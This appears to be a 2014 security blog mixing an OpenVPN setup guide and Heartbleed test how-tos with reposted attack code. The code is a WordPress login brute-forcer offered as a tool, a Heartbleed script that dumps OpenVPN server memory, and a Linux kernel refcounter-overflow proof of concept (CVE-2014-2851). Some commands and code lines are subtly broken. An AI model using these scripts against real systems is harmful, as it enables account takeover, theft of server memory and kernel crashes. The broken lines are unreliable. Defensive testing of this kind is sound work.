CVE Feeds

Apr 23, 2014

Howto: Setup openvpn server on Ubuntu-12.04

1. Install openvpn and openssl
apt-get update apt-get install openvpn openssl vim

2. Copy default config from /usr/share/doc/openvpn/examples/easy-rsa/2.0/ to /etc/openvpn/easy-rsa
cd /etc/openvpn
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 ./easy-rsa

3. Edit /etc/openvpn/easy-rsa/vars
Change from
export EASY_RSA="`pwd`"
to

export EASY_RSA="/etc/openvpn/easy-rsa"

4. Go to /etc/openvpn/easy-rsa and run this command
. ./vars

5. Clear keys
./clean-all

6. Create config openssl.cnf from openssl-1.0.0.cnf
cp openssl-1.0.0.cnf openssl.cnf

7. Build key for openvpn
./build-ca OpenVPN
./build-key-server server
./build-key client1
./build-dh

8. Create openvpn.conf in /etc/openvpn/ with this content.
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nogroup
server 10.10.10.0 255.255.255.0
persist-key
persist-tun
status /var/log/openvpn-status.log
verb 3
client-to-client
push "redirect-gateway def1"
#set the dns servers
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
log-append /var/log/openvpn
comp-lzo


9. Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

10. Create iptable rule for forwarding packet(eth0 is my network name, you must change to your network interface, 10.211.55.25 is my ip of eth0 interface)
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o eth0 -j SNAT --to 10.211.55.25

11. Start openvpn server
/etc/init.d/start

12. Create configure file for client and copy client1 key file that create in step#7.


dev tun
client
proto udp
remote 10.211.55.25 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3

13. Run openvpn client
openvpn client.conf
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Create lab for testing Heartbleed

First, you must use Ubuntu12.04 for this tutorial.

1. Install apache2, openssl
$ apt-get install apache2, openssl

2. Enable https website
$ a2enmod ssl
$ a2ensite default-ssl

3. Download test script from http://www.aldeid.com/wiki/CVE-2014-016-Heartbleed-Vulnerability

4. Test script to your website or openvpn server. 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Check LibSSL for Heartbleed

When you upgrade Ubuntu12.04 with install openssl, it's not guarantee that you have fix the Heartbleed vulnerability. You must install libssl1.0.0 too. By the way, if you want to check OpenSSL version from libssl library, please use this command.

strings /lib/x86_64-linux-gnu/libssl.so.1.0.0 | grep OpenSSL
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 22, 2014

Howto: Convert nmap xml file to csv file

I got the script from http://blog.didierstevens.com/2014/04/16/nmap-grepable-script-output-heartbleed/ and it work perfectly. So I want to write this blog for tell how it work.

1. Using nmap scans
$ nmap -p443 -sV --script=ssl-heartbleed  target -oX test-heartbleed.xml

2.  Download script from the source,(http://didierstevens.com/files/software/nmap-xml-script-output_V0_0_1.zip)

3. Unzip file
$ unzip nmap-xml-script-output_V0_0_1.zip

4. Change permission for executing
chmod +x nmap-xml-script-output.py

5. Run it with the output that you got from #2
./nmap-xml-script-output.py -o test-heartbleed.csv -s "," test-heartbleed.xml

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Multithread wordpress brute forcing tool with python

    #!/usr/bin/python
    # Video: http://youtu.be/mURnM-Yp72g
    # Coded By: xSecurity
     
    import urllib, urllib2, os, sys, requests as xsec, re
    from time import sleep
    from threading import Thread
    def cls():
        linux = 'clear'
        windows = 'cls'
        os.system([linux,windows][os.name == 'nt'])
    cls()
    print '''
          __                      _ _        
    __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
    \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
    >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
    /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
                                        |___/WordPress Brute Muliththreading :)
    #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
    #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
    Special For My Lov3r Cyber-Crystal
    #Usage: Python wp.py http://target.com/ admin pass.txt
    #Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''
     
    xsec = xsec.session()
    def brute(target,usr,pwd):
        get = xsec.get(target+'/wp-admin/')
        post = {}
        post["log"] = usr
        post["pwd"] = pwd
        post["wp-submit"] = "Log+in"
        post["redirect_to"] = target
        post["testcookie"] = "1"
        get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
        get3 = xsec.get(target+'/wp-admin')
        if '<li id="wp-admin-bar-logout">' in get3.text:
            print '[+] Cracked Username: '+usr+' & Password: '+pwd
            os._exit(1)
        else:
            print '[~] Trying ...: '+pwd
     
    if len(sys.argv) >= 3:
        target = sys.argv[1]
        usr = sys.argv[2]
        lst = open(sys.argv[3]).read().split("\n")
        print '[*]Target: '+target
        print '[*]LIST:',len(lst)
        print '[*]Username: '+usr
        thrdlst = []
        for pwd in lst:
            t = Thread(target=brute, args=(target,usr,pwd))
            t.start()
            thrdlst.append(t)
            sleep(0.009)
        for b in thrdlst:
            b.join()
    else:
        print '[>]There Somthing Missing Check ARGVS :)'

Source: http://pastebin.com/4BV4Kj0a

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Heartbleed Vulnerability in VPN

#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 on OpenVPN
# by Stefan Agner (stefan@agner.ch)
# based on work of Jared Stafford and Yonathan Klijnsma
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
target = None
# OpenVPN Session ID
lsesseionid = 0x12345678
packetid = 0
options = OptionParser(usage='%prog server [options]', description='Test for TLS heartbeat vulnerability on OpenVPN Server (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=1194, help='Port to test (default: 1194)')
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
hello_openvpn = h2bin('''
16 03 01 00 df 01 00 00 db 03 01 95 a3 8a 7f 46
a9 1c 78 99 21 ae 92 6d 2d 14 5a 8f 2b c8 ee e2
0b 9e 38 34 ec 3d 66 2b 9c d5 63 00 00 68 c0 14
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04
00 2f 00 96 00 41 00 07 c0 11 c0 07 c0 0c c0 02
00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08
00 06 00 03 00 ff 02 01 00 00 49 00 0b 00 04 03
00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00
0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00
06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00
01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00
0f 00 01 01
''')
# Get OpenVPN header...
def msg_hdr(hdr):
    if hdr is None:
        return None, None, None
    typ, sessionid, packarrlen = struct.unpack('>bQb', hdr)
    #print "Typ %d, SessionID %d, Packet-ID array length %d" % (typ, sessionid, packarrlen)
    return typ, sessionid, packarrlen
def msg_tls_heartbeat_header(data):
    typ, ver, length = struct.unpack('>bhh', data[0:5])
    return typ, ver, length
def msg_tls_heartbeat_request(payload, hb_length=0x4000):
    return struct.pack('>bhhbh{0}s'.format(len(payload)), 24, 0x0301, len(payload) + 3, 1, hb_length, payload)
 
def check_hb(typ, ver, pay_length):
    if typ == 24:
        if pay_length > 3:
            print target + '|VULNERABLE'
        else:
            print target + '|NOT VULNERABLE'
        return True
    if typ == 21:
        print target + '|NOT VULNERABLE'
        return False
    print target + '|NOT VULNERABLE'
    return False
def msg_id(data):
    packid, = struct.unpack('>i', data)
    return packid
def msg_pack(data):
    # Packet ID...
    return
def hexdump(src, length=8):
    result = []
    digits = 4 if isinstance(src, unicode) else 2
    for i in xrange(0, len(src), length):
       s = src[i:i+length]
       hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
       text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
       result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )
    return b'\n'.join(result)
def send_message(s, data):
    global packetid
    start = 0
    length = 0
    cnt = 0
    bytes_remaining = len(data)
    while bytes_remaining > 0:
        if bytes_remaining > 100:
            length = 100
        else:
            length = bytes_remaining
        s.send(struct.pack('>bQbi{0}s'.format(length), 0x20, lsesseionid, 0, packetid, data[start:start+length]))
        sys.stdout.flush()
        packetid += 1
        cnt += 1
        bytes_remaining -= length
        start += length
    return cnt
def handle_message(s):
    global lsesseionid
    data = s.recv(1024)
    pos = 10
    typ, sessionid, packarrlen = msg_hdr(data[0:pos])
    if packarrlen > 0:
        pos = 10 + packarrlen * 4
        msg_pack(data[10:pos])
        # Remote-SessionID
        pos += 8
    if typ == 0x28:
        #print "Ack received"
        return typ, sessionid, packarrlen, None, None
    # Send ACK..
    packid = msg_id(data[pos:pos+4])
    s.send(struct.pack('>bQbiQ', 0x28, lsesseionid, 1, packid, sessionid))
    if typ == 0x20:
        #print "Control Message received"
        return typ, sessionid, packarrlen, packid, data[pos+4:]
    return typ, sessionid, packarrlen, packid, None
def main():
    global target
    global lsesseionid
    global packetid
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    target = args[0]
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sys.stdout.flush()
    s.connect((target, opts.port))
    sys.stdout.flush()
    s.send(struct.pack('>bqbi', 0x38, lsesseionid, 0, packetid))
    packetid += 1
    typ, sessionid, packarrlen, packid, payload = handle_message(s)
    send_message(s, hello_openvpn)
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        # Look for server hello done message.
        if typ == 0x20 and len(payload) < 100:
            break
        if typ == None:
            print "Hello message failed"
            return
    hb_length = 0x1000
    hb = msg_tls_heartbeat_request("Heartbleed test payload", hb_length)
    send_message(s, hb)
    hb_received = False
    heartbleed = ""
    other = 0
    # Heartbeat delivered, if vulnerable, we receive data...
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        if typ == 0x20:
            # Control message, should contain heartbeat answer...
            heartbleed += payload
            if not hb_received:
                # Check HB header early...
                hb_received = True
                tlstype, tlsversion, tlslength = msg_tls_heartbeat_header(payload)
                check_hb(tlstype, tlsversion, tlslength)
        elif typ == 0x28:
            # We received ack only, the server ignored our heartbeat
            print target + '|NOT VULNERABLE (only ACK received)'
            return
        if len(heartbleed) >= hb_length + 5:
            break
    print hexdump(heartbleed[0:100], 16)
if __name__ == '__main__':
    main()
 
 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 21, 2014

Howto: Test Heartbleed with Nmap or Metasploit in Kali

Nmap
1. Update nmap & nse
$ apt-get install nmap
$ nmap --script-updatedb
(Or you can download ssl-heartbleed.nse from https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse, and tls.lua from http://nmap.org/svn/nselib/tls.lua. Save tls.lua to /usr/share/nmap/nselib and ssl-heartbleed.nse to /usr/share/nmap/scripts/)

2.  Using nmap scan with heartbleed script.
$ nmap -sV --script=ssl-heartbleed --script-args vulns.showall target
Options summary:
  • -d turns on debugging output, helpful for seeing problems with the script.
  • --script ssl-heartbleed selects the ssl-heartbleed script to run on appropriate ports.
  • --script-args vulns.showall tells the script to output "NOT VULNERABLE" when it does not detect the vulnerability.
  • -sV requests a service version detection scan, which will allow the script to run against unusual ports that support SSL.
  • --script-trace shows a packet dump of all script-related traffic, which may show memory dumps from the Heartbleed bug.
  • -p 443 limits the script to port 443, but use caution! Even services like SMTP, FTP, and IMAP can be vulnerable.
  • -oA heartbleed-%y%m%d saves Nmap's output in 3 formats as heartbleed-20140410.nmap, heartbleed-20140410.xml, and heartbleed-20140410.gnmap.


Metasploit
1. Update your metasploit
$ msfupdate

2. Get your msfconsole
$ msfconsole

3. Use auxiliary/scanner/ssl/openssl_heartbleed module and set RHOSTS to target host. And run
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> set RHOSTS 
msf> run



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 20, 2014

Tools: 10 Hacking Tools Of Android

1.Hackode

Hackode : The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

2.androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

3.APKInspector

APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualise compiled Android packages and their corresponding DEX code.

4.DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

5.Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

6.zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

7.Droid Sheep

DroidSheep can be easily used by anybody who has an Android device and only the provider of the webservice can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the webservice.

8.dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

9.AppUse – Android Pentest Platform Unified Standalone Environment

AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

10.Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.  


Source: http://www.efytimes.com/e1/fullnews.asp?edid=136275


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Apr 19, 2014

Tools: Linux group_info refcounter overflow memory corruption (CVE-2014-2851)

This post on LKML got me curious and I decided to trigger the overflow to see what it got me.


  1. #include <arpa/inet.h>
  2. #include <stdio.h>
  3. #include <sys/socket.h>
  4. int main(int argc, char *argv[]) {
  5.     int i ;
  6.     struct sockaddr_in saddr;
  7.     unsigned count = (1UL<<32) - 8 ;
  8.     if(argc >= 2){
  9.         // Specify count
  10.         count = atoi(argv[1]);
  11.     }
  12.     printf("count 0x%lx\n",count);
  13.     for(= 0 ; i < count;i++ ){
  14.         socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
  15.         if ( i % ( 1 << 22 ) == 0 )
  16.             printf("%i \n",i);
  17.     }
  18.     //Now make it wrap and crash:
  19.     system("/bin/echo bye bye");
  20. }

If the code doens't work, try different values for count ( argv[1] ), for example -20 . When the exploit finishes, run some nested shells to increment the group_info usage counter : every subprocess will increment the usage counter .

It takes a while because 2^32 syscalls have to be executed, but eventually the refcounter overflows.
When the refcounter is close to be overflown, the code executes another process. When this process finishes, atomic_dec_and_test returns true and the creds are freed while still in use. This results in memory corruption and a crash.

The actual overflows happens in cred.h :

atomic_inc(&gi->usage);
The disassembly of  ping_init_sock shows the overflow:
Dump of assembler code for function ping_init_sock:
   0xffffffff8164b960 <+0>:     push   %rbp
   0xffffffff8164b961 <+1>:     mov    %rsp,%rbp
   0xffffffff8164b964 <+4>:     push   %r12
   0xffffffff8164b966 <+6>:     push   %rbx
   0xffffffff8164b967 <+7>:     data32 data32 data32 xchg %ax,%ax
   0xffffffff8164b96c <+12>:    mov    %gs:0xb880,%rax
   0xffffffff8164b975 <+21>:    mov    0x480(%rax),%rax
   0xffffffff8164b97c <+28>:    mov    0x30(%rdi),%rdx
   0xffffffff8164b980 <+32>:    mov    0x18(%rax),%edi
   0xffffffff8164b983 <+35>:    mov    0x88(%rax),%rax
=> 0xffffffff8164b98a <+42>:    incl   %ds:(%rax)
   0xffffffff8164b98d <+45>:    mov    0x4(%rax),%r10d
   0xffffffff8164b991 <+49>:    lea    0x390(%rdx),%r9



Source: http://thomaspollet.blogspot.be/2014/04/linux-groupinfo-refcounter-overflow.html



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |